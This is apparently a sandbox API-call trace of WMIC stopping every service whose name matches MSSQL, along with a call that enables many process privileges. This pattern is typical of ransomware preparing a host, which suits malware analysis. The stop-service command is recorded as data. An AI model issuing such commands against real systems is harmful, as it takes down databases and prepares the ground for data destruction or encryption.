[0257.838] lstrlenW (lpString="PATH") returned 4 [0257.838] lstrlenW (lpString="path") returned 4 [0257.838] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0257.838] lstrlenW (lpString="/") returned 1 [0257.838] lstrlenW (lpString="Win32_Service") returned 13 [0257.838] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0257.838] lstrlenW (lpString="-") returned 1 [0257.838] lstrlenW (lpString="Win32_Service") returned 13 [0257.838] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0257.838] lstrlenW (lpString="Win32_Service") returned 13 [0257.838] malloc (_Size=0x1c) returned 0x879da8 [0257.838] lstrlenW (lpString="Win32_Service") returned 13 [0257.839] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0x5c007971 | out: _String="Win32_Service", _Context=0x5c007971) returned="Win32_Service" [0257.839] lstrlenW (lpString="Win32_Service") returned 13 [0257.839] malloc (_Size=0x1c) returned 0x87c0e0 [0257.839] lstrlenW (lpString="Win32_Service") returned 13 [0257.839] wcstok (in: _String=0x0, _Delimiter=",", _Context=0x5c007971 | out: _String=0x0, _Context=0x5c007971) returned 0x0 [0257.839] lstrlenW (lpString="") returned 0 [0257.839] lstrlenW (lpString="WHERE") returned 5 [0257.839] lstrlenW (lpString="where") returned 5 [0257.839] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0257.839] lstrlenW (lpString="/") returned 1 [0257.839] lstrlenW (lpString="name like '%%MSSQL%%'") returned 21 [0257.839] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%MSSQL%%'", cchCount1=21, lpString2="/", cchCount2=1) returned 3 [0257.839] lstrlenW (lpString="-") returned 1 [0257.839] lstrlenW (lpString="name like '%%MSSQL%%'") returned 21 [0257.839] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%MSSQL%%'", cchCount1=21, lpString2="-", cchCount2=1) returned 3 [0257.839] lstrlenW (lpString="name like '%%MSSQL%%'") returned 21 [0257.839] malloc (_Size=0x2c) returned 0x87c150 [0257.839] lstrlenW (lpString="name like '%%MSSQL%%'") returned 21 [0257.839] lstrlenW (lpString="/") returned 1 [0257.839] lstrlenW (lpString="call") returned 4 [0257.839] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0257.839] lstrlenW (lpString="-") returned 1 [0257.839] lstrlenW (lpString="call") returned 4 [0257.839] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0257.840] lstrlenW (lpString="call") returned 4 [0257.840] malloc (_Size=0xa) returned 0x87acd8 [0257.840] lstrlenW (lpString="call") returned 4 [0257.840] lstrlenW (lpString="GET") returned 3 [0257.840] lstrlenW (lpString="call") returned 4 [0257.840] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0257.840] lstrlenW (lpString="LIST") returned 4 [0257.840] lstrlenW (lpString="call") returned 4 [0257.840] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0257.840] lstrlenW (lpString="SET") returned 3 [0257.840] lstrlenW (lpString="call") returned 4 [0257.840] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0257.840] lstrlenW (lpString="CREATE") returned 6 [0257.840] lstrlenW (lpString="call") returned 4 [0257.840] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0257.840] lstrlenW (lpString="CALL") returned 4 [0257.840] lstrlenW (lpString="call") returned 4 [0257.840] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0257.840] lstrlenW (lpString="/") returned 1 [0257.841] lstrlenW (lpString="stopservice") returned 11 [0257.841] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0257.841] lstrlenW (lpString="-") returned 1 [0257.841] lstrlenW (lpString="stopservice") returned 11 [0257.841] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0257.841] lstrlenW (lpString="stopservice") returned 11 [0257.841] malloc (_Size=0x18) returned 0x872c20 [0257.841] lstrlenW (lpString="stopservice") returned 11 [0257.841] ??0CHString@@QAE@XZ () returned 0x15db14 [0257.841] GetCurrentThreadId () returned 0x1010 [0257.842] GetCurrentThreadId () returned 0x1010 [0257.842] ??0CHString@@QAE@XZ () returned 0x15da9c [0257.842] malloc (_Size=0x4) returned 0x87c108 [0257.842] malloc (_Size=0xc) returned 0x87ade0 [0257.842] malloc (_Size=0xc) returned 0x87ad08 [0257.842] WbemLocator:IWbemLocator:ConnectServer (in: This=0x4e48a8, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68518 | out: ppNamespace=0xa68518*=0x4eae98) returned 0x0 [0257.920] free (_Block=0x87ad08) [0257.920] CoSetProxyBlanket (pProxy=0x4eae98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0257.920] free (_Block=0x87c108) [0257.920] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0257.920] free (_Block=0x87ade0) [0257.920] malloc (_Size=0xc) returned 0x87ade0 [0257.920] IWbemServices:GetObject (in: This=0x4eae98, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x15db2c*=0x0, ppCallResult=0x0 | out: ppObject=0x15db2c*=0x540300, ppCallResult=0x0) returned 0x0 [0258.094] free (_Block=0x87ade0) [0258.094] IWbemClassObject:BeginMethodEnumeration (This=0x540300, lEnumFlags=0) returned 0x0 [0258.094] IWbemClassObject:NextMethod (in: This=0x540300, lFlags=0, pstrName=0x15db38*=0x0, ppInSignature=0x15db34*=0x0, ppOutSignature=0x15db30*=0x0 | out: pstrName=0x15db38*="StartService", ppInSignature=0x15db34*=0x0, ppOutSignature=0x15db30*=0x5404f8) returned 0x0 [0258.097] lstrlenW (lpString="StartService") returned 12 [0258.097] lstrlenW (lpString="stopservice") returned 11 [0258.097] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0258.097] IUnknown:Release (This=0x5404f8) returned 0x0 [0258.097] IWbemClassObject:NextMethod (in: This=0x540300, lFlags=0, pstrName=0x15db38*=0x0, ppInSignature=0x15db34*=0x0, ppOutSignature=0x15db30*=0x0 | out: pstrName=0x15db38*="StopService", ppInSignature=0x15db34*=0x0, ppOutSignature=0x15db30*=0x5404f8) returned 0x0 [0258.097] lstrlenW (lpString="StopService") returned 11 [0258.097] lstrlenW (lpString="stopservice") returned 11 [0258.097] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0258.097] malloc (_Size=0x38) returned 0x87c8f8 [0258.097] ??0CHString@@QAE@XZ () returned 0x15d67c [0258.098] GetCurrentThreadId () returned 0x1010 [0258.098] IWbemClassObject:GetNames (in: This=0x5404f8, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x15d68c | out: pNames=0x15d68c*="\x01ƀ\x04") returned 0x0 [0258.099] SafeArrayGetLBound (in: psa=0x540820, nDim=0x1, plLbound=0x15d678 | out: plLbound=0x15d678) returned 0x0 [0258.099] SafeArrayGetUBound (in: psa=0x540820, nDim=0x1, plUbound=0x15d674 | out: plUbound=0x15d674) returned 0x0 [0258.099] SafeArrayGetElement (in: psa=0x540820, rgIndices=0x15d680, pv=0x15d690 | out: pv=0x15d690) returned 0x0 [0258.099] malloc (_Size=0x24) returned 0x87c938 [0258.099] IWbemClassObject:GetPropertyQualifierSet (in: This=0x5404f8, wszProperty="ReturnValue", ppQualSet=0x15d5a0 | out: ppQualSet=0x15d5a0*=0x4ea9f8) returned 0x0 [0258.099] malloc (_Size=0xc) returned 0x87ad08 [0258.099] IWbemQualifierSet:Get (in: This=0x4ea9f8, wszName="CIMTYPE", lFlags=0, pVal=0x15d570*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x15d570*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x0), plFlavor=0x0) returned 0x0 [0258.099] free (_Block=0x87ad08) [0258.099] malloc (_Size=0xc) returned 0x87ad08 [0258.099] IWbemClassObject:Get (in: This=0x5404f8, wszName="ReturnValue", lFlags=0, pVal=0x15d548*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x15d584*=1430892, plFlavor=0x0 | out: pVal=0x15d548*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x15d584*=19, plFlavor=0x0) returned 0x0 [0258.100] malloc (_Size=0xc) returned 0x87ade0 [0258.101] IWbemQualifierSet:Get (in: This=0x4ea9f8, wszName="read", lFlags=0, pVal=0x15d588*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x15d588*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0258.101] free (_Block=0x87ade0) [0258.101] malloc (_Size=0xc) returned 0x87ade0 [0258.101] IWbemQualifierSet:Get (in: This=0x4ea9f8, wszName="write", lFlags=0, pVal=0x15d588*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x15d588*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0258.101] free (_Block=0x87ade0) [0258.101] malloc (_Size=0xc) returned 0x87ade0 [0258.101] malloc (_Size=0xc) returned 0x87ab70 [0258.101] IWbemQualifierSet:Get (in: This=0x4ea9f8, wszName="Description", lFlags=0, pVal=0x15d560*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x15d560*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0258.101] free (_Block=0x87ab70) [0258.101] malloc (_Size=0xc) returned 0x87adf8 [0258.101] lstrlenA (lpString="Not Available") returned 13 [0258.101] malloc (_Size=0x1c) returned 0x87c968 [0258.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa21d94, cbMultiByte=-1, lpWideCharStr=0x87c968, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0258.101] free (_Block=0x87c968) [0258.101] IUnknown:Release (This=0x4ea9f8) returned 0x0 [0258.101] malloc (_Size=0x24) returned 0x87c968 [0258.102] malloc (_Size=0xc) returned 0x87ab10 [0258.102] malloc (_Size=0x24) returned 0x87c998 [0258.102] malloc (_Size=0x38) returned 0x87c9c8 [0258.102] malloc (_Size=0x24) returned 0x87ca08 [0258.102] free (_Block=0x87c998) [0258.102] free (_Block=0x87c968) [0258.102] free (_Block=0x87c938) [0258.102] free (_Block=0x87ade0) [0258.102] free (_Block=0x87adf8) [0258.102] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0258.102] IWbemClassObject:GetMethodQualifierSet (in: This=0x540300, wszMethod="StopService", ppQualSet=0x15da94 | out: ppQualSet=0x15da94*=0x5147c0) returned 0x0 [0258.102] malloc (_Size=0xc) returned 0x87ade0 [0258.102] IWbemQualifierSet:Get (in: This=0x5147c0, wszName="Implemented", lFlags=0, pVal=0x15da7c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x15da7c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0258.103] free (_Block=0x87ade0) [0258.103] malloc (_Size=0xc) returned 0x87ade0 [0258.103] malloc (_Size=0xc) returned 0x87adf8 [0258.103] IWbemQualifierSet:Get (in: This=0x5147c0, wszName="Description", lFlags=0, pVal=0x15da6c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x15da6c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x0), plFlavor=0x0) returned 0x0 [0258.103] free (_Block=0x87adf8) [0258.103] malloc (_Size=0xc) returned 0x87ac00 [0258.104] IUnknown:Release (This=0x5147c0) returned 0x0 [0258.104] malloc (_Size=0x38) returned 0x87c938 [0258.104] malloc (_Size=0x38) returned 0x87c978 [0258.104] malloc (_Size=0x24) returned 0x87ca38 [0258.104] malloc (_Size=0xc) returned 0x87adf8 [0258.104] malloc (_Size=0x38) returned 0x87ca68 [0258.104] malloc (_Size=0x38) returned 0x87caa8 [0258.104] malloc (_Size=0x24) returned 0x87cae8 [0258.104] malloc (_Size=0x28) returned 0x87cb18 [0258.104] malloc (_Size=0x38) returned 0x87cb48 [0258.104] malloc (_Size=0x38) returned 0x87cb88 [0258.104] malloc (_Size=0x24) returned 0x87cbc8 [0258.104] free (_Block=0x87cae8) [0258.104] free (_Block=0x87caa8) [0258.104] free (_Block=0x87ca68) [0258.104] free (_Block=0x87ca38) [0258.104] free (_Block=0x87c978) [0258.104] free (_Block=0x87c938) [0258.104] IUnknown:Release (This=0x5404f8) returned 0x0 [0258.104] free (_Block=0x87ca08) [0258.104] free (_Block=0x87c9c8) [0258.104] free (_Block=0x87c8f8) [0258.104] IWbemClassObject:NextMethod (in: This=0x540300, lFlags=0, pstrName=0x15db38*=0x0, ppInSignature=0x15db34*=0x0, ppOutSignature=0x15db30*=0x0 | out: pstrName=0x15db38*="PauseService", ppInSignature=0x15db34*=0x0, ppOutSignature=0x15db30*=0x5404f8) returned 0x0 [0258.104] lstrlenW (lpString="PauseService") returned 12 [0258.105] lstrlenW (lpString="stopservice") returned 11 [0258.105] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0258.105] IUnknown:Release (This=0x5404f8) returned 0x0 [0258.105] IWbemClassObject:NextMethod (in: This=0x540300, lFlags=0, pstrName=0x15db38*=0x0, ppInSignature=0x15db34*=0x0, ppOutSignature=0x15db30*=0x0 | out: pstrName=0x15db38*="ResumeService", ppInSignature=0x15db34*=0x0, ppOutSignature=0x15db30*=0x5404f8) returned 0x0 [0258.105] lstrlenW (lpString="ResumeService") returned 13 [0258.105] lstrlenW (lpString="stopservice") returned 11 [0258.105] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0258.105] IUnknown:Release (This=0x5404f8) returned 0x0 [0258.105] IWbemClassObject:NextMethod (in: This=0x540300, lFlags=0, pstrName=0x15db38*=0x0, ppInSignature=0x15db34*=0x0, ppOutSignature=0x15db30*=0x0 | out: pstrName=0x15db38*="InterrogateService", ppInSignature=0x15db34*=0x0, ppOutSignature=0x15db30*=0x5404f8) returned 0x0 [0258.105] lstrlenW (lpString="InterrogateService") returned 18 [0258.105] lstrlenW (lpString="stopservice") returned 11 [0258.105] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0258.105] IUnknown:Release (This=0x5404f8) returned 0x0 [0258.105] IWbemClassObject:NextMethod (in: This=0x540300, lFlags=0, pstrName=0x15db38*=0x0, ppInSignature=0x15db34*=0x0, ppOutSignature=0x15db30*=0x0 | out: pstrName=0x15db38*="UserControlService", ppInSignature=0x15db34*=0x5404f8, ppOutSignature=0x15db30*=0x542fb0) returned 0x0 [0258.106] lstrlenW (lpString="UserControlService") returned 18 [0258.106] lstrlenW (lpString="stopservice") returned 11 [0258.106] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0258.106] IUnknown:Release (This=0x5404f8) returned 0x0 [0258.106] IUnknown:Release (This=0x542fb0) returned 0x0 [0258.106] IWbemClassObject:NextMethod (in: This=0x540300, lFlags=0, pstrName=0x15db38*=0x0, ppInSignature=0x15db34*=0x0, ppOutSignature=0x15db30*=0x0 | out: pstrName=0x15db38*="Create", ppInSignature=0x15db34*=0x5404f8, ppOutSignature=0x15db30*=0x544f80) returned 0x0 [0258.107] lstrlenW (lpString="Create") returned 6 [0258.107] lstrlenW (lpString="stopservice") returned 11 [0258.107] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0258.107] IUnknown:Release (This=0x5404f8) returned 0x0 [0258.107] IUnknown:Release (This=0x544f80) returned 0x0 [0258.107] IWbemClassObject:NextMethod (in: This=0x540300, lFlags=0, pstrName=0x15db38*=0x0, ppInSignature=0x15db34*=0x0, ppOutSignature=0x15db30*=0x0 | out: pstrName=0x15db38*="Change", ppInSignature=0x15db34*=0x5404f8, ppOutSignature=0x15db30*=0x544d00) returned 0x0 [0258.107] lstrlenW (lpString="Change") returned 6 [0258.107] lstrlenW (lpString="stopservice") returned 11 [0258.107] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0258.107] IUnknown:Release (This=0x5404f8) returned 0x0 [0258.107] IUnknown:Release (This=0x544d00) returned 0x0 [0258.108] IWbemClassObject:NextMethod (in: This=0x540300, lFlags=0, pstrName=0x15db38*=0x0, ppInSignature=0x15db34*=0x0, ppOutSignature=0x15db30*=0x0 | out: pstrName=0x15db38*="ChangeStartMode", ppInSignature=0x15db34*=0x5404f8, ppOutSignature=0x15db30*=0x543120) returned 0x0 [0258.108] lstrlenW (lpString="ChangeStartMode") returned 15 [0258.108] lstrlenW (lpString="stopservice") returned 11 [0258.108] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0258.108] IUnknown:Release (This=0x5404f8) returned 0x0 [0258.108] IUnknown:Release (This=0x543120) returned 0x0 [0258.108] IWbemClassObject:NextMethod (in: This=0x540300, lFlags=0, pstrName=0x15db38*=0x0, ppInSignature=0x15db34*=0x0, ppOutSignature=0x15db30*=0x0 | out: pstrName=0x15db38*="Delete", ppInSignature=0x15db34*=0x0, ppOutSignature=0x15db30*=0x5162b8) returned 0x0 [0258.108] lstrlenW (lpString="Delete") returned 6 [0258.108] lstrlenW (lpString="stopservice") returned 11 [0258.108] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0258.108] IUnknown:Release (This=0x5162b8) returned 0x0 [0258.108] IWbemClassObject:NextMethod (in: This=0x540300, lFlags=0, pstrName=0x15db38*=0x0, ppInSignature=0x15db34*=0x0, ppOutSignature=0x15db30*=0x0 | out: pstrName=0x15db38*="GetSecurityDescriptor", ppInSignature=0x15db34*=0x0, ppOutSignature=0x15db30*=0x5404f8) returned 0x0 [0258.108] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0258.108] lstrlenW (lpString="stopservice") returned 11 [0258.108] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0258.108] IUnknown:Release (This=0x5404f8) returned 0x0 [0258.109] IWbemClassObject:NextMethod (in: This=0x540300, lFlags=0, pstrName=0x15db38*=0x0, ppInSignature=0x15db34*=0x0, ppOutSignature=0x15db30*=0x0 | out: pstrName=0x15db38*="SetSecurityDescriptor", ppInSignature=0x15db34*=0x5404f8, ppOutSignature=0x15db30*=0x542fb0) returned 0x0 [0258.109] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0258.109] lstrlenW (lpString="stopservice") returned 11 [0258.109] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0258.109] IUnknown:Release (This=0x5404f8) returned 0x0 [0258.109] IUnknown:Release (This=0x542fb0) returned 0x0 [0258.109] IWbemClassObject:NextMethod (in: This=0x540300, lFlags=0, pstrName=0x15db38*=0x0, ppInSignature=0x15db34*=0x0, ppOutSignature=0x15db30*=0x0 | out: pstrName=0x15db38*=0x0, ppInSignature=0x15db34*=0x0, ppOutSignature=0x15db30*=0x0) returned 0x40005 [0258.109] IUnknown:Release (This=0x540300) returned 0x0 [0258.110] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0258.111] lstrlenW (lpString="SET") returned 3 [0258.111] lstrlenW (lpString="call") returned 4 [0258.111] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0258.111] lstrlenW (lpString="CREATE") returned 6 [0258.111] lstrlenW (lpString="call") returned 4 [0258.111] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0258.111] free (_Block=0x872b00) [0258.111] malloc (_Size=0x4) returned 0x87c108 [0258.111] lstrlenW (lpString="GET") returned 3 [0258.111] lstrlenW (lpString="call") returned 4 [0258.111] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0258.111] lstrlenW (lpString="LIST") returned 4 [0258.111] lstrlenW (lpString="call") returned 4 [0258.111] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0258.111] lstrlenW (lpString="ASSOC") returned 5 [0258.111] lstrlenW (lpString="call") returned 4 [0258.111] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0258.111] WbemLocator:IUnknown:AddRef (This=0x4e48a8) returned 0x3 [0258.111] free (_Block=0x872788) [0258.111] lstrlenW (lpString="") returned 0 [0258.111] lstrlenW (lpString="NQDPDE") returned 6 [0258.112] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0258.112] lstrlenW (lpString="NQDPDE") returned 6 [0258.112] malloc (_Size=0xe) returned 0x87ab70 [0258.112] lstrlenW (lpString="NQDPDE") returned 6 [0258.112] GetCurrentThreadId () returned 0x1010 [0258.112] GetCurrentProcess () returned 0xffffffff [0258.112] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x15fc10 | out: TokenHandle=0x15fc10*=0x2f8) returned 1 [0258.112] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x15fc0c | out: TokenInformation=0x0, ReturnLength=0x15fc0c) returned 0 [0258.112] malloc (_Size=0x118) returned 0x87c8f8 [0258.112] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x87c8f8, TokenInformationLength=0x118, ReturnLength=0x15fc0c | out: TokenInformation=0x87c8f8, ReturnLength=0x15fc0c) returned 1 [0258.112] AdjustTokenPrivileges (in: TokenHandle=0x2f8, DisableAllPrivileges=0, NewState=0x87c8f8*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0258.112] free (_Block=0x87c8f8) [0258.112] CloseHandle (hObject=0x2f8) returned 1 [0258.112] lstrlenW (lpString="GET") returned 3 [0258.112] lstrlenW (lpString="call") returned 4 [0258.112] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0258.112] lstrlenW (lpString="LIST") returned 4 [0258.112] lstrlenW (lpString="call") returned 4 [0258.112] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0258.112] lstrlenW (lpString="SET") returned 3 [0258.112] lstrlenW (lpString="call") returned 4 [0258.112] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0258.112] lstrlenW (lpString="CALL") returned 4 [0258.112] lstrlenW (lpString="call") returned 4 [0258.113] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0258.113] ??0CHString@@QAE@XZ () returned 0x15fbd0 [0258.113] GetCurrentThreadId () returned 0x1010 [0258.113] malloc (_Size=0xc) returned 0x87ab28 [0258.113] malloc (_Size=0xc) returned 0x87ab88 [0258.113] malloc (_Size=0xc) returned 0x87aba0 [0258.113] malloc (_Size=0xc) returned 0x87abe8 [0258.113] malloc (_Size=0xc) returned 0x879898 [0258.113] SysStringLen (param_1="\\\\") returned 0x2 [0258.113] SysStringLen (param_1="NQDPDE") returned 0x6 [0258.113] malloc (_Size=0xc) returned 0x87cec8 [0258.113] SysStringLen (param_1="\\\\NQDPDE") returned 0x8 [0258.113] SysStringLen (param_1="\\") returned 0x1 [0258.114] malloc (_Size=0xc) returned 0x87cd78 [0258.114] SysStringLen (param_1="\\\\NQDPDE\\") returned 0x9 [0258.114] SysStringLen (param_1="root\\cimv2") returned 0xa [0258.114] free (_Block=0x87cec8) [0258.114] free (_Block=0x879898) [0258.114] free (_Block=0x87abe8) [0258.114] free (_Block=0x87aba0) [0258.114] free (_Block=0x87ab88) [0258.114] free (_Block=0x87ab28) [0258.114] malloc (_Size=0xc) 